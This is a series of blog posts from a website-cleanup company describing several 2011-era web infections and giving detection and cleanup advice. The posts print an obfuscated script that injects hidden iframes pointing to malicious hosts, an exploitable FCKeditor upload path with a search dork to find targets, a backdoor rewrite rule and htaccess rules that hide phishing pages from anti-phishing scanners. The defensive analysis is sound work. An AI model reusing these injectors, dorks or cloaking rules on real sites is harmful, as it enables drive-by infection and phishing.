This infection has been around for awhile, but it’s been more popular recently.

We’ve been seeing it after the closing html tag in index.html files:

Here’s the code:

(opening script tag) var BrowserDetect = { init: function () { this.browser = this.searchString(this.dataBrowser) || "An unknown browser"; this.version = this.searchVersion(navigator.userAgent)...');}else {}(closing script tag)

There have been other domains in place of allegianstaffing.com too, but the bottom line is that the above script performs a series of browser checks then creates an iframe.

This infection has been seen in Zen Cart, osCommerce, WordPress and Prestashop websites by us, but I’m certain that it’s just the infection used at the moment.

If you’ve experienced this infection and need assistance with it, please call us at (847)728-0214 or email me at traef@wewatchyourwebsite.com

If you have any comments to add to this, please leave a comment below.

Thank you.

As you may know from our previous posts, we’ve been watching the willysy.com infection of millions of e-commerce websites over the past few weeks.

Now, it appears that many of these are still infected and the hackers have now changed the infection to:

hxxp://tiasissi. com .br/revendedores/jquery

What’s really frustrating from our perspective, is that these are so easy to prevent. To date, we’ve cleaned 1,179 of these infections and no repeat infections – our methods work!

With the willysy infections we’ve seen many entries in the admin section of the osCommerce database which shows that the hackers have taken total control of these websites and this is just the infectious code they prefer to use for now.

There are many different backdoor shell scripts the hackers are installing on these websites and code inserted into the payment processing files that allow the hackers to steal the credit card information as it gets processed.

This is all cleanable and prevention is quite easy.

Contact us to have your website cleaned or email me at: traef@wewatchyourwebsite.com

If you have questions about this, please leave a comment. We’ll respond promptly.

Thank you.

UPDATE August 6, 2011: The number of websites infected with this had risen to over 5 million. The prevention of this type of attack is really quite simple – and something we’ve been applying to clients websites for some time.

Currently 100,000+ osCommerce (and variations of osCommerce) pages have been infected with an iframe that points to: willysy(dot)com.

Our research finds these iframes in the title tags and at various img tag locations throughout the webpages which led us to look in the database.

We see the code in the title tags at the top of the page, inserted as the description of the store logo, following the “images/store_logo.png” or “images/logo.gif” and other similar logo links. and also in the copyright section in many web pages:

Our suggestion is to export the entire database, download it to your local computer and search for any strings with “iframe” (no quotes) in them. A few of these iframe strings have been obfuscated, so also look for the string: document.write.

Other domains used in this attack are:

• exero.eu
• yandekapi.com

It’s certain that more will follow.

Our research indicates that most of these websites are osCommerce or an osCommerce related website. In 89% of the websites we investigated, they have left the admin folder unchanged, which means they have not followed the recommendation of renaming the admin folder. Since this is a simple process, I would tend to believe that they have not followed other security recommendations and left their websites open to an attack.

You may see entries in your log files like this:

XXX.XXX.XXX.XXX – - [08/Jul/2011:02:19:54 -0500] “GET /admin/configuration.php/login.php HTTP/1.1″ 200 24492 “http://(domain removed)/admin/configuration.php/login.php” “Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)”

The key here is the “200″ following the HTTP/1.1 string. This means the above GET request was successful.

This will be followed by:

GET /admin/configuration.php/login.php?gID=1&cID=1&action=edit HTTP/1.1″ 200 24835 “-” “Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)”

and…

“POST /admin/configuration.php/login.php?gID=1&cID=1&action=save HTTP/1.1″ 302 – “-” “Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)”

To prevent this, you should:

1. Rename the admin folder to something that does not include the word ‘admin’
2. Depending on what version of osCommerce you’re running, you should modify the code in application_top.php (2 files) to eliminate the $PHP_SELF
3. You should disable define_language.php and file_manager.php
4. Use various methods to prevent the configuration.php/login.php in the URL

You may also find additional users in your administrators table. Hackers have been adding these as well. Many of them will have their own email address as well so that a request to reset a password will go to them.

Various .php backdoors and some Perl shell scripts might be added to your website as well. The hackers have been using a variety of these in order to maintain control of the website.

First, make a backup of your database. Then after all these database entries have been found and removed, you’ll have to change the password to your database as they obviously know what it is and then import your database.

All of this needs to be cleaned up.

If you need help in cleaning this up, please send an email to support@wewatchyourwebsite.com or call me directly at (847)833-5666

I realize we’re not the first to write about this, but my intention is not to be a ground-breaking news source, but for our readers, I hope to be at least educational.

We’ve been seeing more log files, ever since we’ve been beta testing our new log analyzer, with probes for fckeditor and also editormonkey. This has led us on a journey to see why.

What we found was that many people are using editormonkey, even though it’s been “shelved” for some time. This means, no updates, nobody to fix bugs or more importantly – no security patches.

Here is a screenshot from the Editormonkey website:

Screen shot from editormonkey website

For those of you unfamiliar with FCKeditor and Editormonkey, they work with various programs like WordPress, Joomla and other Content Management Systems (CMS), to provide a more robust writing platform.

These programs were designed to bring more text editing features to web based programs.

According to the CKEditor website:

The problem with any plugin, component, module, etc. is that they often times provide a file manager. A file manager for an editor is key so you can upload graphic files without leaving the editor. For instance, if you wanted to add a picture to something you’re writing about, you would upload it to your website and then insert into your text. A good editor will enable you to perform that task, without ever leaving the editor.

When you have multiple ways of uploading files to your website, you also introduce multiple exploits for hackers to abuse and infect your website.

Let’s see what is so bad about this.

First, let me begin by saying that if you follow our security principles, you’ll know that all software should be kept up-to-date.

ALL SOFTWARE!!!

Yes, that means even web based editors.

For older versions of FCKeditor, like 2.0 -> 2.2, this string is dangerous:

http://[target]/[path]/editor/filemanager/browser/default/connectors/php/connector.php

This allows an attacker to upload a file, like a backdoor shell script to the vulnerable website without any real “hacking” skills.

How would a hacker know you have this installed on your website?

Google is a hacker’s best friend. They can search using:

inurl:/editor/filemanager/browser/default/connectors/php/connector.php

And find websites that Google has indexed and found that string.

What can you do to prevent this?

I’m glad you asked.

First, you can update your software. As posted above, FCKeditor has been renamed CKEditor. Update immediately.

Next, you can also use “security by obscurity”. In your robots.txt file you specify what the search engines index on your website. Does the world need to know what plugins you’re using in your WordPress blog?

Probably not.

You can use something like this in your robots.txt file:

# Hide certain folders from spiders User-agent: * Disallow: /(path to your editor folder)

We’re not big fans of relying on security by obscurity so you should also locate the config.php file. It’s usually located here:

editor/filemanager/connectors/php/config.php

Open it with a text editor and search for the line that looks like:

$Config['Enabled'] = true ;

And change “true” to “false” (no quotes). That will disable that connector.

Other safety precautions you can take is to password protect the editor folder. Usually your hosting provider will have that option in their Control Panel for your account.

You could also delete the filemanager folder altogether. This eliminates the vulnerability completely.

If you absolutely have to upload files to your website via the editor, then I suggest you pick some area of your website to designate as an upload folder, but you should know that the permissions on that upload folder have to be set to 777 (world readable/writable). Again, you are warned not to do this.

In review, always use a multi-layered strategy for website security.

1. Keep all software updated – even editors
2. Hide folders from search engines
3. Hide folders by using password protection
4. Disable potentially vulnerable functions
5. Hire a good security company (like us!)

It’s rare for me to post twice in the same day, but I thought this one needed your attention.

In some infected osCommerce and WordPress sites we’ve been seeing this line of code:

var emob = googleanalytics;var emsk = 126853 * 4;var emsp = googleanalytics.id.substr(1,0);var k = 1;var t = emob.innerHTML.split...(removed)

In the osCommerce sites it was in:

/catalog/includes/languages/english/define_mainpage.php

In the WordPress sites it was in:

wp-load.php

Usually at the end of a div tag in the body of the page code. This has been noticed more and more. It used to be that the malicious code was somewhere either in the beginning or near the end of the page code.

This code works by looking like legitimate google-analytics code, but notice that in the opening script tag, that’s not a src variable. It’s snc. Which looks at first like src, but it’s not.

What the code does is replace use the id variable and replace it with a different URL and then the code at the end of the malscript sets the source for the script src with:

emob.src = emsp.substr(15)

Of the ones we’ve cleaned, so far, they’ve all pointed to:

hxxp:// chadon.nl/js/jquery.js

We’ve gathered the log files for these sites and processed them through our log analyzer and found that the hackers are using file inclusion strings in already vulnerable sites to infect them.

We can remove this from your site and help protect it or, if you have your files downloaded to your PC and have already installed grepWin, you can use this regex to find and remove these strings from your website files:

We’ve been seeing more infected websites that when viewed with a browser show the following:

Fatal error: Cannot redeclare corelibrarieshandler() (previously declared in /home/content/(all changed)/index.php:4) in /home/content/(all changed)/includes/defines.php on line 11

The error always appears to show the error on line 11. As of this writing google shows 3,570 results for this error message. Some of these have already been flagged with Google’s warning: “This site may harm your computer”. Some haven’t. We’ve also seen where some of the websites showing for this search term have already been cleaned.

The code that is causing this error is:

The above code is inserted into many, if not all, .php files which makes clean up a little difficult.

For this clean-up, if you don’t want us to clean it for you, you can use grepWin.

First you’ll have to download all your website files to your local computer.

Then, if you’re on Windows, you can use grepWin along with this regex search string:

Then set grepWin to scan all files, create a backup and to scan the folder with your downloaded files in it and hit replace.

Then you can copy the new files up to your website.

You’re not finished. If you don’t close the point of entry, the hackers will be back. Many of the infections we’ve seen are either the result of stolen FTP passwords or out dated software. Some have been WordPress, Joomla, or osCommerce that have not been properly secured.

I think this will be growing more over the next few days. Update your sites now.

Please post back with a comment if you have anything to add to this or have further questions.

Thank you.

First an announcement: The number of websites we’ve cleaned just passed 75,000!

In reviewing our recent activity, I noticed a number of sites that have a certain similar characteristic – a large number of infected websites have a folder added to the named .log or .logs

The dot (.) in front of a folder name causes it to be hidden by default so many FTP programs wouldn’t show that folder.

In addition to the “hidden” folder, we also found .htaccess files with the following: RewriteEngine On RewriteCond %{REQUEST_FILENAME} !-f RewriteCond %{REQUEST_FILENAME} !-d RewriteRule ^(.*)$ /31.php?q=$1 [L]

The part that would be different is the 31.php. Often times this was any random 2 digits, but we’ve also seen some files that were a random name:

rhau.php roseanne.php

The contents of the those randonly named .php files was always about the same: eval(gzuncompress(base64_decode('eNqVWG2P4kYM...

This file was used by the hackers as the “backdoor” to the website for future infections, etc.

Inside the .log or .logs folder was another folder named the same as the infected website. Inside that folder was a file:

xmlrpc.txt

in the case of the folder named .log, the contents of which lead to a website that the backdoor can request new instructions or other malicious code from. In the cases where we found a .logs folder, we found the same structure, another folder named with the infected website, then a file:

ref.xmlrpc.php

The contents of which were similar to the xmlrpc.txt file, a website where the 2 digit file could get further malicious code or additional files.

Some of the websites we’ve seen listed in this xmlrpc.txt/re.xmlrpc.php are: love-adamnet.net boolin.in love-adambiz.net love-adaminfo.net love-adamorg.net bestorgblog.net and many others...

This line of code is inserted somewhere in a .htm/.html/.php file: img heigth="1" width="1" border="0" src="hxxp: //imgaaa. net/t.php?id=8021025">

usually at the very end of the file, after the closing html tag.

The hackers are using different domains in this img tag, but most of them are similar to:

imgccc.net imgddd.net ( you get the idea )

and obviously the id at the end is different.

This begs the question: Why?

What’s the purpose of all of this? What are the hackers gaining by this and how are they getting in?

First, the why.

Inside many of the .log folders we’re seeing many, many hundreds of .html files for various products/services. For instance:

• WHIPPLE GRID
• WESTERN EYES
• SPANISH JAZZ
• SHARK DRAW
• OSSA MOTORCYCLE

One common thread with these files is that they all start with h1 tags, the above text, or some other topic, all in upper case, a variety of links to more files on that same infected website and content all optimized for search engine results.

So the hackers are using this scenario to drive traffic to various websites – mostly images. What’s at those websites? Mostly we found the fake anti-virus websites waiting for the unsuspecting visitor.

Now the how.

How does this happen?

In most cases, after our log analyzers finished their work, we found that this resulted from stolen FTP credentials. In other words, a virus is on a PC. That PC has been used to FTP files to the infected website. The virus can either “sniff” the FTP traffic, and since FTP transmits all data in plain text, it’s easy for the virus to see and steal the the username and password from the traffic, or the virus steals the FTP login credentials from a file saved on the PC.

Many free FTP programs store their saved login credentials in a plain text file on the local PC. When a virus infects a computer it looks for these files and steals the information.

After the virus steals this information, it sends it to a server which then carries out the infection.

What can you do?

You can make sure that you’re running a good anti-virus program on your PC. Then make certain that it stays updated and runs full system scans everyday. I know it takes time and I know it’s a hassle, but so is cleaning up your website.

Also, if your hosting provider supports FTPS or SFTP, switch to that instead of FTP. The reason is that FTPS and SFTP send their traffic encrypted, not in plain text. This makes it much more difficult (not impossible) to sniff and steal.

To clean this up, find and remove the entire .log or .logs folder. If you have an account with many sub-domains, you’ll have to check each sub-domain or add-on domain folder as well.

1. Using either the file manager from your hosting provider account or your FTP program, delete the entire .log or .logs folder.
2. If you can download all the files from your website to your local computer, search all files for:

   eval(gzuncompress(base64_decode

   and remove those files.

3. Check all .htaccess files for the code listed above in the .htaccess content I provided.
4. Change all FTP passwords.
5. Update your anti-virus signatures and run a full system scan. Insist that anyone else with FTP access do the same and do not give them new passwords until they have run a full system scan with an updated anti-virus program. Ask them for the report at the end.

We recommend that each person with FTP access have their own FTP account. Also, check with your hosting provider to be sure that FTP and access logging is enabled. That way, if your site is ever infected again, you can search through the logs, or we can do it for you as part of our service, and determine who’s PC was infected, or at least how the code was inserted into your website.

If you need help cleaning up your website, please send me an email: traef@wewatchyourwebsite.com – we’ll clean it up for you.

If you have any further comments about this infection, or questions, please post a comment.

Thank you.

We’re seeing more and more obfuscated javascript infections recently.

The latest one:

y='rum';n='s';fp='afe';e='tp';bo='/f';lk='o.c';bl='742';x='7';i='ra';h='c';gf='.'; fl='ht';q='//';w='c';pu='554';mk='p?';qg='tp=';il='ph';yy='o';am='5e';k='.c';c='me'; u='r';d='20a';qd='1';z='prw';xu='if';iy='a';f=':';a=xu.concat(i,c);kx=n.concat (u,h);l=fl.concat(e,f,q,z,qd,k,lk,w,bo,yy,y,gf,il,mk,qg,bl,d,am,pu,fp,iy,x);var ov=document.createElement(a);ov.setAttribute('width','5');ov.setAttribute ('height','5');ov.setAttribute('style','display:none');ov.setAttribute (kx,l);document.body.appendChild(ov);lb='r';r='d3b';q='.c';b='or';v='e'; bi='e30';gl='?';j='c/f';ru='l';pj='a';zh='m.';h='a';xc='me';i='c';z='tp:';n='4';ye='='; lg='s';qk='426';jp='ht';g='a';k='z';ut='u';c='//p';pr='7f';o='i';by='fr';ck='3';pl='php'; pe='tp';e='a';nc='.co';gz=o.concat(by,h,xc);kx=lg.concat(lb,i);dv=jp.concat (z,c,k,ru,ck,nc,q,j,b,ut,zh,pl,gl,pe,ye,v,pj,r,e,qk,pr,bi,g,n);var bo=document.createElement(gz); bo.setAttribute('width','5');bo.setAttribute('height','5');bo.setAttribute('style','display:none'); bo.setAttribute(kx,dv);document.body.appendChild(bo);

deobfuscates to:

iframe setAttribute src = hxxp: //prw1.co.cc/forum.php?tp=74220a5e554afea7

and:

iframe setAttribute src = hxxp://pzl3.co.cc/forum.php?tp=ead3ba4267fe30a4

Which are listed as suspicious by Google:

What is the current listing status for prw1.co.cc?

Site is listed as suspicious – visiting this web site may harm your computer.

Part of this site was listed for suspicious activity 2 time(s) over the past 90 days.

What happened when Google visited this site?

Of the 5 pages we tested on the site over the past 90 days, 0 page(s) resulted in malicious software being downloaded and installed without user consent. The last time Google visited this site was on 2011-04-09, and the last time suspicious content was found on this site was on 2011-04-08. Malicious software includes 440 scripting exploit(s).

and…

What is the current listing status for pzl3.co.cc?

Site is listed as suspicious – visiting this web site may harm your computer.

Part of this site was listed for suspicious activity 1 time(s) over the past 90 days.

What happened when Google visited this site?

Of the 4 pages we tested on the site over the past 90 days, 0 page(s) resulted in malicious software being downloaded and installed without user consent. The last time Google visited this site was on 2011-04-27, and the last time suspicious content was found on this site was on 2011-04-27. Malicious software includes 334 scripting exploit(s).

In gathering data and searching for the source of the vulnerability that leads to this infection on websites (now totaling about 38,500), there is no common denominator with the infected websites.

It doesn’t appear to be WordPress or Joomla or osCommerce or any of the other popular website packages.

It might be more stolen FTP login credentials.

If you have further information on this, please post here, or email me at traef@wewatchyourwebsite.com.

Thank you.

A fishing buddy of mine describes fishing as, “a jerk on one end of the line, waiting for a jerk on the other end”.

As we have been “beefing-up” our phishing detection, I started thinking about my friend’s comment. Couldn’t phishing be described the same way?

We talk with people everyday who’s websites have been infected by hackers and quite often we hear, “What do these jerks want with my website?” So there is a jerk on one end of the line, waiting for a jerk (or unsuspecting person) on the other end.

Phishing as you probably know, is the act of “fooling” someone into providing their Personally Identifiable Information (PII). In the early days of phishing, you would get an email that may have had all the correct graphics to make it look legitimate, however, there would typically be common mispelled words and other grammatical errors that would indicate that something was amiss.

Now days, the emails look legitimate and so do the websites that are linked to, from the bogus emails.

You may see emails with subject lines like, “PayPal security alert”, or “Attempted change to your banking login”, in order to alarm you into action.

In this post, I’m going to educate you on what hackers do to websites to get them ready for phishing.

First, realize that when a website is compromised (hacked) by someone, they have many options:

• They can inject a script that attempts to infect the computer of any of your visitors
• They can store their games and other illegally obtained software on the site
• They can add phishing files and use the compromised site to steal PII
• Or, in worst case scenarios, they delete all the files to cover their tracks

For now, we’re going to focus on using compromised sites for phishing.

When the hackers turn their attention to phishing, they want to hide their “work” from prying eyes, but yet make it widely available to their potential victims.

How to determine if your website is being used for phishing?

We typically find the phishing files deep inside a multiple level folder structure. It’s not unusual for us to find phishing files buried 10 sub-folders (directories) deep on a website. It’s so common that you could almost classify it as a characteristic of phishing files.

Hackers are so determined to keep their phishing files hidden that they even protect them. We’ve found on numerous sites where the hackers have used a .htaccess file to help keep their files hidden.

Some of the entries in an .htaccess file are:

setenvifnocase Referer castlecops.com spammer=yes setenvifnocase Referer internetidentity.com spammer=yes setenvifnocase Referer phishfighting.com spammer=yes setenvifnocase Referer phishtank.com spammer=yes setenvifnocase Referer spamcop.net spammer=yes setenvifnocase Referer spam spammer=yes setenvifnocase Referer phish spammer=yes setenvifnocase Referer bezeqint.net spammer=yes

Order Allow,Deny Allow from all Deny from env=spammer

Let me explain.

Castlecops.com, InternetIdentity.com, Phishfighting.com, Phishtank.com and Spamcop.net all scan the Internet looking for phishing pages. This .htaccess says that if the referer is one of these sites, then identify that traffic as spam (spammer=yes). The Order Allow,Deny section says to allow all traffic (Allow from all), but deny any visitors previously identified as being a spammer.

Of course these sites are not spammers, but that’s what the hacker has identified them as for their own protection. Also, the hackers believe that if someone, such as yourself, looks inside this file, you may just think it’s some security measure and leave it alone.

If you get an email from one of the above organizations, you may want to check your website files for phishing folders.

Some strings to search for are:

hsbcMainContent HSBC Premier By United 4U online.lloydstsb.co.uk Personal Banking Online Verification Lloyds TSB FullZ By GhostRideR internetbanking $annualIncome OnlineBankingRegistration Northern Rock Online Your mother’s maiden name Your Security Number Barclays Secure Form Log in to Digital Banking RBS Refund Form

There are many, many others but this should get you started.

If you have any questions about phishing, or identifying phishing files on your website, please email me at traef@wewatchyourwebsite.com.

If you have any information about phishing that you’d like to share, please leave a comment.

It was reported by Websense here about a new infection that’s hit thousands of websites.

This infection is referred to as LizaMoon because that is the first, and most popular domain seen in this infection. I think, instead of lizamoon, it could be referred to as the “ur.php” infection, but that’s just my opinion.

You can tell if your website has this if any of your pages, when viewed through a browser, have code inserted that looks like:

Some common traits that are interesting to note are:

1. The script tags have the < and > code instead of the “” 2. The inserted code appears in the title tag 3. The inserted code appears in many drop-down listings 4. The infection appears to be only in .asp, .aspx and .cfm web pages

Many of these traits do lead to an apparent SQL injection due to where they’re located in the rendered webpage. Websense commented on their blog that this might be tracked to a vulnerability in Microsoft’s SQL 2003 and 2005. We don’t doubt their findings, but we could not confirm that ourselves, however, seeing that the infected sites are based on either ASP(X) or Cold Fusion, it does lead us to believe this.

Other domains used in this infection: alexblane.com alisa-carter.com milapop.com eva-marine.info tadygus.com google-stats49.info google-stats45.info google-stats50.info stats-master99.info world-of-books.com tzy-stats.info agasi-story.info

…and many others and the list will definitely be changing as this moves forward.

Many of the sites used as redirections in this infection are the fake anti-virus based websites where they (the hackers) try to trick the visitor into believing their PC is infected.

At the time we investigated this, we found that the fake anti-virus software these sites attempt to install on a visitor’s PC is known as “Windows Stability Center”. Currently this is only detected by 13 out of 43 different anti-virus programs – so it’s effectiveness could be quite high.

To check your website, you could either perform SQL queries or export your database and do text search for the string: “ur.php” as that file seems associated with all the domains used in this infection.

Whether you want to call this the Lizamoon infection or use my suggestion of the “ur.php” infection, it’s infecting thousands of websites. As of this writing a Google search on the above script string shows 531,000 results.

Please comment on what you think about this. Have you been infected by this? Anyone have further insight?